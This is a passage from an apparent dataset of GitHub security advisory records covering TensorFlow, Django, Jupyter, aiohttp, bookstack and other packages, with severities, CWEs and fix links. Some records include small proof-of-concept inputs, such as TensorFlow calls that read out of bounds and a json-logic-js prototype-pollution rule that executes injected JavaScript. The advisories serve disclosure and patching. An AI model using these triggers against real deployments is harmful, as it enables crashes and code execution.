Update to version 1.6.1 or later. | {'CVE-2016-10582'} | 2021-01-08T18:40:46Z | 2019-02-18T23:51:19Z | HIGH | 0 | {'CWE-311'} | {'https://nvd.nist.gov/vuln/detail/CVE-2016-10582', 'https://github.com/advisories/GHSA-hjgp-8ffr-hwwr', 'https://nodesecurity.io/advisories/169', 'https://www.npmjs.com/advisories/169', 'https://github.com/dcodeIO/ClosureCompiler.js/commit/e59848f5975e5b15279c044daf9cff8ff192bae6'} | null | {'https://github.com/dcodeIO/ClosureCompiler.js/commit/e59848f5975e5b15279c044daf9cff8ff192bae6'} | {'https://github.com/dcodeIO/ClosureCompiler.js/commit/e59848f5975e5b15279c044daf9cff8ff192bae6'} |
GHSA | GHSA-49qr-xh3w-h436 | Moderate severity vulnerability that affects notebook | Jupyter Notebook before 5.7.1 allows XSS via an untrusted notebook because nbconvert responses are considered to have the same origin as the notebook server. In other words, nbconvert endpoints can execute JavaScript with access to the server API. In notebook/nbconvert/handlers.py, NbconvertFileHandler and NbconvertPostHandler do not set a Content Security Policy to prevent this. | {'CVE-2018-19351'} | 2021-09-01T14:11:52Z | 2018-11-21T22:15:47Z | MODERATE | 6.1 | {'CWE-79'} | {'https://github.com/advisories/GHSA-49qr-xh3w-h436', 'https://pypi.org/project/notebook/#history', 'https://lists.debian.org/debian-lts-announce/2020/11/msg00033.html', 'https://nvd.nist.gov/vuln/detail/CVE-2018-19351', 'https://groups.google.com/forum/#!topic/jupyter/hWzu2BSsplY', 'https://github.com/jupyter/notebook/blob/master/docs/source/changelog.rst', 'https://github.com/jupyter/notebook/commit/107a89fce5f413fb5728c1c5d2c7788e1fb17491'} | null | {'https://github.com/jupyter/notebook/commit/107a89fce5f413fb5728c1c5d2c7788e1fb17491'} | {'https://github.com/jupyter/notebook/commit/107a89fce5f413fb5728c1c5d2c7788e1fb17491'} |
GHSA | GHSA-gr4c-5rq6-cgh3 | OPC UA applications can allow a remote attacker to determine a Server's private key | An issue was discovered in OPC UA .NET Standard Stack and Sample Code before GitHub commit 2018-04-12, and OPC UA .NET Legacy Stack and Sample Code before GitHub commit 2018-03-13. A vulnerability in OPC UA applications can allow a remote attacker to determine a Server's private key by sending carefully constructed bad UserIdentityTokens as part of an oracle attack. | {'CVE-2018-7559'} | 2022-04-26T19:12:43Z | 2018-10-16T19:58:42Z | MODERATE | 5.3 | null | {'https://github.com/OPCFoundation/UA-.NETStandard/commit/ebcf026a54dd0c9052cff009d96d827ac923d150', 'https://github.com/OPCFoundation/UA-.NET-Legacy/commit/e2a781b38efb8686d2bd850c2f2372b5c670bc45', 'http://www.securityfocus.com/bid/108688', 'https://github.com/advisories/GHSA-gr4c-5rq6-cgh3', 'https://nvd.nist.gov/vuln/detail/CVE-2018-7559', 'https://opcfoundation-onlineapplications.org/faq/SecurityBulletins/OPC_Foundation_Security_Bulletin_CVE-2018-7559.pdf'} | null | {'https://github.com/OPCFoundation/UA-.NET-Legacy/commit/e2a781b38efb8686d2bd850c2f2372b5c670bc45', 'https://github.com/OPCFoundation/UA-.NETStandard/commit/ebcf026a54dd0c9052cff009d96d827ac923d150'} | {'https://github.com/OPCFoundation/UA-.NETStandard/commit/ebcf026a54dd0c9052cff009d96d827ac923d150', 'https://github.com/OPCFoundation/UA-.NET-Legacy/commit/e2a781b38efb8686d2bd850c2f2372b5c670bc45'} |
GHSA | GHSA-vjg4-v33c-ggc4 | Out of bounds read in Tensorflow | ### Impact
The [implementation of `FractionalAvgPoolGrad`](https://github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/fractional_avg_pool_op.cc#L209-L360) does not consider cases where the input tensors are invalid allowing an attacker to read from outside of bounds of heap:
```python
import tensorflow as tf
@tf.function
def test():
y = tf.raw_ops.FractionalAvgPoolGrad(
orig_input_tensor_shape=[2,2,2,2],
out_backprop=[[[[1,2], [3, 4], [5, 6]], [[7, 8], [9,10], [11,12]]]],
row_pooling_sequence=[-10,1,2,3],
col_pooling_sequence=[1,2,3,4],
overlapping=True)
return y
test()
```
### Patches
We have patched the issue in GitHub commit [002408c3696b173863228223d535f9de72a101a9](https://github.com/tensorflow/tensorflow/commit/002408c3696b173863228223d535f9de72a101a9).
The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by Yu Tian of Qihoo 360 AIVul Team. | {'CVE-2022-21730'} | 2022-02-10T00:19:29Z | 2022-02-09T18:29:45Z | HIGH | 8.1 | {'CWE-125'} | {'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-vjg4-v33c-ggc4', 'https://github.com/advisories/GHSA-vjg4-v33c-ggc4', 'https://github.com/tensorflow/tensorflow/commit/002408c3696b173863228223d535f9de72a101a9', 'https://github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/fractional_avg_pool_op.cc#L209-L360', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21730'} | null | {'https://github.com/tensorflow/tensorflow/commit/002408c3696b173863228223d535f9de72a101a9'} | {'https://github.com/tensorflow/tensorflow/commit/002408c3696b173863228223d535f9de72a101a9'} |
GHSA | GHSA-fvgf-6h6h-3322 | Improper Limitation of a Pathname to a Restricted Directory | In Django 2.2 before 2.2.18, 3.0 before 3.0.12, and 3.1 before 3.1.6, the django.utils.archive.extract method (used by "startapp --template" and "startproject --template") allows directory traversal via an archive with absolute paths or relative paths with dot segments. | {'CVE-2021-3281'} | 2021-09-28T20:55:35Z | 2021-03-18T20:29:49Z | MODERATE | 5.3 | {'CWE-22'} | {'https://docs.djangoproject.com/en/3.1/releases/3.0.12/', 'https://www.djangoproject.com/weblog/2021/feb/01/security-releases/', 'https://github.com/advisories/GHSA-fvgf-6h6h-3322', 'https://groups.google.com/forum/#!forum/django-announce', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YF52FKEH5S2P5CM4X7IXSYG67YY2CDOO/', 'https://security.netapp.com/advisory/ntap-20210226-0004/', 'https://github.com/django/django/commit/05413afa8c18cdb978fcdf470e09f7a12b234a23', 'https://docs.djangoproject.com/en/3.1/releases/security/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3281'} | null | {'https://github.com/django/django/commit/05413afa8c18cdb978fcdf470e09f7a12b234a23'} | {'https://github.com/django/django/commit/05413afa8c18cdb978fcdf470e09f7a12b234a23'} |
GHSA | GHSA-8434-v7xw-8m9x | Improper Neutralization of Argument Delimiters in a Decompiling Package Process in APKLeaks | APKLeaks prior to v2.0.4 allows remote authenticated attackers to execute arbitrary OS commands via package name inside application manifest.
### Impact
An attacker could include arguments that allow unintended commands or code to be executed, allow sensitive data to be read or modified or could cause other unintended behavior through malicious package name.
### Patches
The problem is fixed in version v2.0.4 and above.
### Workarounds
```bash
> git fetch --tags; git checkout v2.0.6-dev
```
Or pull to the latest version:
```bash
> git pull origin master
```
### References
- a966e781499ff6fd4eea66876d7532301b13a382
### For more information
If you have any questions or comments about this advisory:
* Email me at [me@dw1.io](mailto:me@dw1.io)
| {'CVE-2021-21386'} | 2022-04-19T19:02:50Z | 2022-01-21T23:03:39Z | CRITICAL | 9.3 | {'CWE-88', 'CWE-78'} | {'https://github.com/dwisiswant0/apkleaks/security/advisories/GHSA-8434-v7xw-8m9x', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21386', 'https://github.com/advisories/GHSA-8434-v7xw-8m9x', 'https://github.com/dwisiswant0/apkleaks/commit/a966e781499ff6fd4eea66876d7532301b13a382'} | null | {'https://github.com/dwisiswant0/apkleaks/commit/a966e781499ff6fd4eea66876d7532301b13a382'} | {'https://github.com/dwisiswant0/apkleaks/commit/a966e781499ff6fd4eea66876d7532301b13a382'} |
GHSA | GHSA-v6wp-4m6f-gcjg | Open redirect vulnerability in `aiohttp` (`normalize_path_middleware` middleware) | ### Impact
_What kind of vulnerability is it? Who is impacted?_
Open redirect vulnerability — a maliciously crafted link to an aiohttp-based web-server could redirect the browser to a different website.
It is caused by a bug in the `aiohttp.web_middlewares.normalize_path_middleware` middleware.
### Patches
_Has the problem been patched? What versions should users upgrade to?_
This security problem has been fixed in v3.7.4. Upgrade your dependency as follows:
[`pip install aiohttp >= 3.7.4`]
### Workarounds
_Is there a way for users to fix or remediate the vulnerability without upgrading?_
If upgrading is not an option for you, a workaround can be to avoid using `aiohttp.web_middlewares.normalize_path_middleware` in your applications.
### References
_Are there any links users can visit to find out more?_
* [aiohttp @ PyPI]
* [GHSA-v6wp-4m6f-gcjg]
* [OWASP page on open redirects]
### For more information
If you have any questions or comments about this advisory:
* Open an issue in the [aiohttp repo](https://github.com/aio-libs/aiohttp/issues/new/choose)
* Email us at wk+aio-libs-security@sydorenko.org.ua and/or andrew.svetlov+aio-libs-security@gmail.com
Credit: [Jelmer Vernooij] and [Beast Glatisant].
[aiohttp @ PyPI]: https://pypi.org/p/aiohttp
[`pip install aiohttp >= 3.7.4`]: https://pypi.org/project/aiohttp/3.7.4/
[GHSA-v6wp-4m6f-gcjg]: https://github.com/aio-libs/aiohttp/security/advisories/GHSA-v6wp-4m6f-gcjg
[OWASP page on open redirects]:
https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html
[Jelmer Vernooij]: https://jelmer.uk
[Beast Glatisant]: https://github.com/g147 | {'CVE-2021-21330'} | 2022-04-19T19:02:48Z | 2021-02-26T02:11:57Z | LOW | 3.1 | {'CWE-601'} | {'https://pypi.org/project/aiohttp/', 'https://github.com/advisories/GHSA-v6wp-4m6f-gcjg', 'https://www.debian.org/security/2021/dsa-4864', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21330', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JN3V7CZJRT4QFCVXB6LDPCJH7NAOFCA5/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FU7ENI54JNEK3PHEFGCE46DGMFNTVU6L/', 'https://github.com/aio-libs/aiohttp/security/advisories/GHSA-v6wp-4m6f-gcjg', 'https://github.com/aio-libs/aiohttp/blob/master/CHANGES.rst#374-2021-02-25', 'https://github.com/aio-libs/aiohttp/commit/2545222a3853e31ace15d87ae0e2effb7da0c96b'} | null | {'https://github.com/aio-libs/aiohttp/commit/2545222a3853e31ace15d87ae0e2effb7da0c96b'} | {'https://github.com/aio-libs/aiohttp/commit/2545222a3853e31ace15d87ae0e2effb7da0c96b'} |
GHSA | GHSA-ghhm-xrwp-75m9 | bookstack is vulnerable to Improper Access Control | bookstack is vulnerable to Improper Access Control | {'CVE-2021-4194'} | 2022-01-14T19:39:05Z | 2022-01-08T00:34:12Z | MODERATE | 4.3 | {'CWE-668', 'CWE-284'} | {'https://github.com/bookstackapp/bookstack/commit/cb0d674a71449de883713db2fcdccb6e108992ad', 'https://github.com/advisories/GHSA-ghhm-xrwp-75m9', 'https://nvd.nist.gov/vuln/detail/CVE-2021-4194', 'https://huntr.dev/bounties/0bc8b3f7-9057-4eb7-a989-24cd5689f114'} | null | {'https://github.com/bookstackapp/bookstack/commit/cb0d674a71449de883713db2fcdccb6e108992ad'} | {'https://github.com/bookstackapp/bookstack/commit/cb0d674a71449de883713db2fcdccb6e108992ad'} |
GHSA | GHSA-mc7w-4cjf-c973 | OS Command Injection in node-opencv | utils/find-opencv.js in node-opencv (aka OpenCV bindings for Node.js) prior to 6.1.0 is vulnerable to Command Injection. It does not validate user input allowing attackers to execute arbitrary commands. | {'CVE-2019-10061'} | 2021-10-12T22:06:57Z | 2021-10-12T22:06:57Z | CRITICAL | 9.8 | {'CWE-78'} | {'https://github.com/peterbraden/node-opencv/commit/81a4b8620188e89f7e4fc985f3c89b58d4bcc86b', 'https://www.npmjs.com/advisories/789', 'https://github.com/advisories/GHSA-mc7w-4cjf-c973', 'https://www.npmjs.com/package/opencv', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10061', 'https://github.com/peterbraden/node-opencv/commit/aaece6921d7368577511f06c94c99dd4e9653563'} | null | {'https://github.com/peterbraden/node-opencv/commit/aaece6921d7368577511f06c94c99dd4e9653563', 'https://github.com/peterbraden/node-opencv/commit/81a4b8620188e89f7e4fc985f3c89b58d4bcc86b'} | {'https://github.com/peterbraden/node-opencv/commit/81a4b8620188e89f7e4fc985f3c89b58d4bcc86b', 'https://github.com/peterbraden/node-opencv/commit/aaece6921d7368577511f06c94c99dd4e9653563'} |
GHSA | GHSA-7rg4-266c-jqw6 | Predictable CSRF tokens in centreon/centreon | An issue was discovered in Centreon-Web in Centreon Platform 20.10.0. The anti-CSRF token generation is predictable, which might allow CSRF attacks that add an admin user. | {'CVE-2021-28055'} | 2021-06-08T20:12:56Z | 2021-06-08T20:12:56Z | MODERATE | 6.5 | {'CWE-352', 'CWE-330'} | {'https://github.com/advisories/GHSA-7rg4-266c-jqw6', 'https://github.com/centreon/centreon/releases/tag/2.8.37', 'https://github.com/centreon/centreon/commit/0261d4b250135eb513fdb7d52ba6fdeb19c6863f', 'https://github.com/centreon/centreon/pull/9612', 'https://github.com/centreon/centreon/commit/626d3fb91cef402df0ebda5a8165d8f45da67c7a', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28055', 'https://github.com/centreon/centreon/releases/tag/19.10.23'} | null | {'https://github.com/centreon/centreon/commit/626d3fb91cef402df0ebda5a8165d8f45da67c7a', 'https://github.com/centreon/centreon/commit/0261d4b250135eb513fdb7d52ba6fdeb19c6863f'} | {'https://github.com/centreon/centreon/commit/626d3fb91cef402df0ebda5a8165d8f45da67c7a', 'https://github.com/centreon/centreon/commit/0261d4b250135eb513fdb7d52ba6fdeb19c6863f'} |
GHSA | GHSA-m9hw-7xfv-wqg7 | Prototype Pollution in json-logic-js | Versions of json-logic-js prior to 2.0.0 are vulnerable to Prototype Pollution. The method operation allows a malicious user to modify the prototype of Object through the method property name. This causes modification of any existing property that will exist on all objects and leads to Remote Code Execution.
The following rule creates a popup when run from a browser:
```
{
"method": [
{
"method": [
{
"var": "__proto__.constructor.is.__proto__"
},
"constructor",
[
"var x = 'SECURITY!'; console.log(x, window.fetch); alert(x)"
]
]
},
"call"
]
}
``` | null | 2020-11-12T19:36:14Z | 2020-11-12T19:36:14Z | HIGH | 0 | {'CWE-471'} | {'https://github.com/jwadhams/json-logic-js/commit/fadfa5dc7ccd1cc5c9a1900a97a15af390bf642b', 'https://www.npmjs.com/advisories/1542', 'https://github.com/advisories/GHSA-m9hw-7xfv-wqg7', 'https://www.npmjs.com/package/json-logic-js'} | null | {'https://github.com/jwadhams/json-logic-js/commit/fadfa5dc7ccd1cc5c9a1900a97a15af390bf642b'} | {'https://github.com/jwadhams/json-logic-js/commit/fadfa5dc7ccd1cc5c9a1900a97a15af390bf642b'} |
GHSA | GHSA-9p47-w5xp-f4xr | Downloads Resources over HTTP in windows-build-tools | Affected versions of `windows-build-tools` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `windows-build-tools`.
## Recommendation
Update to version 1.0.0 or later. | {'CVE-2017-16003'} | 2021-01-08T19:03:26Z | 2018-11-09T17:48:37Z | HIGH | 0 | {'CWE-311'} | {'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90)', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16003', 'https://github.com/advisories/GHSA-9p47-w5xp-f4xr', 'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90', 'https://www.npmjs.com/advisories/304', 'https://nodesecurity.io/advisories/304'} | null | {'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90', 'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90)'} | {'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90', 'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90)'} |
GHSA | GHSA-hjp8-2cm3-cc45 | Cookie exposure in requestretry | Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository fgribreau/node-request-retry prior to 7.0.0 via cookies being leaked to external sites. | {'CVE-2022-0654'} | 2022-03-03T22:02:14Z | 2022-02-24T00:00:54Z | HIGH | 7.5 | {'CWE-200'} | {'https://huntr.dev/bounties/a779faf5-c2cc-48be-a31d-4ddfac357afc', 'https://github.com/advisories/GHSA-hjp8-2cm3-cc45', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0654', 'https://github.com/fgribreau/node-request-retry/commit/0979c6001d9d57c2aac3157c11b007397158922a'} | null | {'https://github.com/fgribreau/node-request-retry/commit/0979c6001d9d57c2aac3157c11b007397158922a'} | {'https://github.com/fgribreau/node-request-retry/commit/0979c6001d9d57c2aac3157c11b007397158922a'} |
GHSA | GHSA-w2f4-hxpm-mq98 | bookstack is vulnerable to Unrestricted Upload of File with Dangerous Type | bookstack is vulnerable to Unrestricted Upload of File with Dangerous Type. | {'CVE-2021-3915'} | 2021-11-17T21:12:03Z | 2021-11-15T23:17:37Z | HIGH | 7.6 | {'CWE-434'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-3915', 'https://github.com/advisories/GHSA-w2f4-hxpm-mq98', 'https://huntr.dev/bounties/fcb65f2d-257a-46f4-bac9-f6ded5649079', 'https://github.com/bookstackapp/bookstack/commit/ae155d67454d6b9f6c93b2bb457aaa4b2eb1a9ed'} | null | {'https://github.com/bookstackapp/bookstack/commit/ae155d67454d6b9f6c93b2bb457aaa4b2eb1a9ed'} | {'https://github.com/bookstackapp/bookstack/commit/ae155d67454d6b9f6c93b2bb457aaa4b2eb1a9ed'} |
GHSA | GHSA-59q2-x2qc-4c97 | Heap OOB access in unicode ops | ### Impact
An attacker can access data outside of bounds of heap allocated array in `tf.raw_ops.UnicodeEncode`:
```python
import tensorflow as tf
input_values = tf.constant([58], shape=[1], dtype=tf.int32)
input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32)
output_encoding = "UTF-8"
tf.raw_ops.UnicodeEncode(
input_values=input_values, input_splits=input_splits,
output_encoding=output_encoding)
```
This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/472c1f12ad9063405737679d4f6bd43094e1d36d/tensorflow/core/kernels/unicode_ops.cc)
assumes that the `input_value`/`input_splits` pair specify a valid sparse tensor.
### Patches
We have patched the issue in GitHub commit [51300ba1cc2f487aefec6e6631fef03b0e08b298](https://github.com/tensorflow/tensorflow/commit/51300ba1cc2f487aefec6e6631fef03b0e08b298).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team. | {'CVE-2021-29559'} | 2021-05-21T14:24:54Z | 2021-05-21T14:24:54Z | LOW | 2.5 | {'CWE-125'} | {'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-59q2-x2qc-4c97', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29559', 'https://github.com/tensorflow/tensorflow/commit/51300ba1cc2f487aefec6e6631fef03b0e08b298', 'https://github.com/advisories/GHSA-59q2-x2qc-4c97'} | null | {'https://github.com/tensorflow/tensorflow/commit/51300ba1cc2f487aefec6e6631fef03b0e08b298'} | {'https://github.com/tensorflow/tensorflow/commit/51300ba1cc2f487aefec6e6631fef03b0e08b298'} |
GHSA | GHSA-hwcf-pp87-7x6p | Moderate severity vulnerability that affects ejs | nodejs ejs version older than 2.5.5 is vulnerable to a Cross-site-scripting in the ejs.renderFile() resulting in code injection | {'CVE-2017-1000188'} | 2021-09-14T17:32:10Z | 2017-11-30T23:15:05Z | MODERATE | 6.1 | {'CWE-79'} | {'https://github.com/mde/ejs/commit/49264e0037e313a0a3e033450b5c184112516d8f', 'http://www.securityfocus.com/bid/101889', 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000188', 'https://github.com/advisories/GHSA-hwcf-pp87-7x6p'} | null | {'https://github.com/mde/ejs/commit/49264e0037e313a0a3e033450b5c184112516d8f'} | {'https://github.com/mde/ejs/commit/49264e0037e313a0a3e033450b5c184112516d8f'} |
GHSA | GHSA-4vrf-ff7v-hpgr | Division by zero in TFLite's implementation of `EmbeddingLookup` | The implementation of the `EmbeddingLookup` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/e4b29809543b250bc9b19678ec4776299dd569ba/tensorflow/lite/kernels/embedding_lookup.cc#L73-L74):
```cc
const int row_size = SizeOfDimension(value, 0);
const int row_bytes = value->bytes / row_size;
```
An attacker can craft a model such that the first dimension of the `value` input is 0.
### Patches
We have patched the issue in GitHub commit [f61c57bd425878be108ec787f4d96390579fb83e](https://github.com/tensorflow/tensorflow/commit/f61c57bd425878be108ec787f4d96390579fb83e).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360. | {'CVE-2021-29596'} | 2021-05-21T14:27:51Z | 2021-05-21T14:27:51Z | LOW | 2.5 | {'CWE-369'} | {'https://github.com/tensorflow/tensorflow/commit/f61c57bd425878be108ec787f4d96390579fb83e', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29596', 'https://github.com/advisories/GHSA-4vrf-ff7v-hpgr', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4vrf-ff7v-hpgr'} | null | {'https://github.com/tensorflow/tensorflow/commit/f61c57bd425878be108ec787f4d96390579fb83e'} | {'https://github.com/tensorflow/tensorflow/commit/f61c57bd425878be108ec787f4d96390579fb83e'} |
GHSA | GHSA-h676-pjr4-hgqx | Path Traversal in S-Cart | A Directory Traversal vulnerability exists in S-Cart 6.7 via download in sc-admin/backup. | {'CVE-2021-44111'} | 2022-02-26T00:28:57Z | 2022-02-12T00:00:42Z | MODERATE | 4.4 | {'CWE-22'} | {'https://github.com/s-cart/core/commit/328dd312866b86144b43941dee2ad942708f70da', 'https://github.com/s-cart/s-cart/issues/102', 'https://nvd.nist.gov/vuln/detail/CVE-2021-44111', 'https://github.com/advisories/GHSA-h676-pjr4-hgqx'} | null | {'https://github.com/s-cart/core/commit/328dd312866b86144b43941dee2ad942708f70da'} | {'https://github.com/s-cart/core/commit/328dd312866b86144b43941dee2ad942708f70da'} |
GHSA | GHSA-x3v8-c8qx-3j3r | Null pointer exception in `DeserializeSparse` | ### Impact
The [shape inference code for `DeserializeSparse`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/sparse_ops.cc#L152-L168) can trigger a null pointer dereference:
```python
import tensorflow as tf
dataset = tf.data.Dataset.range(3)
@tf.function
def test():
y = tf.raw_ops.DeserializeSparse(
serialized_sparse=tf.data.experimental.to_variant(dataset),
dtype=tf.int32)
test()
```
This is because the shape inference function assumes that the `serialize_sparse` tensor is a tensor with positive rank (and having `3` as the last dimension). However, in the example above, the argument is a scalar (i.e., rank 0).
### Patches
We have patched the issue in GitHub commit [d3738dd70f1c9ceb547258cbb82d853da8771850](https://github.com/tensorflow/tensorflow/commit/d3738dd70f1c9ceb547258cbb82d853da8771850).
The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360. | {'CVE-2021-41215'} | 2021-11-10T18:57:45Z | 2021-11-10T18:57:45Z | MODERATE | 5.5 | {'CWE-476'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-41215', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-x3v8-c8qx-3j3r', 'https://github.com/advisories/GHSA-x3v8-c8qx-3j3r', 'https://github.com/tensorflow/tensorflow/commit/d3738dd70f1c9ceb547258cbb82d853da8771850'} | null | {'https://github.com/tensorflow/tensorflow/commit/d3738dd70f1c9ceb547258cbb82d853da8771850'} | {'https://github.com/tensorflow/tensorflow/commit/d3738dd70f1c9ceb547258cbb82d853da8771850'} |
GHSA | GHSA-8xc6-g8xw-h2c4 | YARP Denial of Service Vulnerability | ### Impact
A denial of service vulnerability exists in how YARP processes input.
### Patches
If you're using YARP `1.0.0`, you should update to NuGet package version [`1.0.1`](https://www.nuget.org/packages/Yarp.ReverseProxy/1.0.1).
If you're using YARP `1.1.0-RC.1`, you should update to NuGet package version [`1.1.0-rc.1.22211.2`](https://www.nuget.org/packages/Yarp.ReverseProxy/1.1.0-rc.1.22211.2).
You can do so by updating the `PackageReference` in your `.csproj` file
```diff
<ItemGroup>
- <PackageReference Include="Yarp.ReverseProxy" Version="1.0.0" />
- <PackageReference Include="Yarp.Telemetry.Consumption" Version="1.0.0" />
+ <PackageReference Include="Yarp.ReverseProxy" Version="1.0.1" />
+ <PackageReference Include="Yarp.Telemetry.Consumption" Version="1.0.1" />
</ItemGroup>
```
or by selecting `1.0.1` in the NuGet UI inside Visual Studio (`Manage NuGet Packages` / `Updates`)

### References
[CVE-2022-26924](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26924) | {'CVE-2022-26924'} | 2022-05-03T17:43:20Z | 2022-04-22T20:23:44Z | HIGH | 7.5 | null | {'https://github.com/microsoft/reverse-proxy/commit/11e6272da17beb03d0b44a19d3c4f1ffa52b7c38', 'https://nvd.nist.gov/vuln/detail/CVE-2022-26924', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26924', 'https://github.com/advisories/GHSA-8xc6-g8xw-h2c4', 'https://github.com/microsoft/reverse-proxy/security/advisories/GHSA-8xc6-g8xw-h2c4', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26924'} | null | {'https://github.com/microsoft/reverse-proxy/commit/11e6272da17beb03d0b44a19d3c4f1ffa52b7c38'} | {'https://github.com/microsoft/reverse-proxy/commit/11e6272da17beb03d0b44a19d3c4f1ffa52b7c38'} |
GHSA | GHSA-f2rp-4rv7-fc95 | Exposure of Sensitive Information to an Unauthorized Actor in foreman_fog_proxmox | A flaw was found in the Foreman project. The Proxmox compute resource exposes the password through the API to an authenticated local attacker with view_hosts permission. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. Versions before foreman_fog_proxmox 0.13.1 are affected | {'CVE-2021-20259'} | 2021-06-16T20:01:38Z | 2021-06-10T15:54:43Z | HIGH | 7.8 | {'CWE-200'} | {'https://github.com/advisories/GHSA-f2rp-4rv7-fc95', 'https://github.com/theforeman/foreman_fog_proxmox/releases/tag/v0.13.1', 'https://bugzilla.redhat.com/show_bug.cgi?id=1932144', 'https://github.com/theforeman/foreman_fog_proxmox/pull/184/commits/b7e910bf61563f5d447c71b1b41e2a373a794d7b', 'https://nvd.nist.gov/vuln/detail/CVE-2021-20259'} | null | {'https://github.com/theforeman/foreman_fog_proxmox/pull/184/commits/b7e910bf61563f5d447c71b1b41e2a373a794d7b'} | {'https://github.com/theforeman/foreman_fog_proxmox/pull/184/commits/b7e910bf61563f5d447c71b1b41e2a373a794d7b'} |
GHSA | GHSA-jgjc-332c-8cmc | SQL injection in phpMyAdmin | An issue was discovered in phpMyAdmin before 4.9.2. A crafted database/table name can be used to trigger a SQL injection attack through the designer feature. | {'CVE-2019-18622'} | 2021-08-19T16:24:17Z | 2020-01-16T21:56:15Z | CRITICAL | 9.8 | {'CWE-89'} | {'https://github.com/phpmyadmin/composer/commit/51acbf53564d9b52e78509a5688ec2b68976b5f7', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W5GW4KEMNCBQYZCIXEJYC42OEBBN2NSH/', 'https://nvd.nist.gov/vuln/detail/CVE-2019-18622', 'https://www.phpmyadmin.net/security/PMASA-2019-5/', 'http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00024.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BA4DGF7KTQS6WA2DRNJSW66L43WB7LRV/', 'https://security.gentoo.org/glsa/202003-39', 'https://github.com/advisories/GHSA-jgjc-332c-8cmc', 'http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00002.html'} | null | {'https://github.com/phpmyadmin/composer/commit/51acbf53564d9b52e78509a5688ec2b68976b5f7'} | {'https://github.com/phpmyadmin/composer/commit/51acbf53564d9b52e78509a5688ec2b68976b5f7'} |
GHSA | GHSA-mvff-h3cj-wj9c | Unprivileged pod using `hostPath` can side-step active LSM when it is SELinux | ### Impact
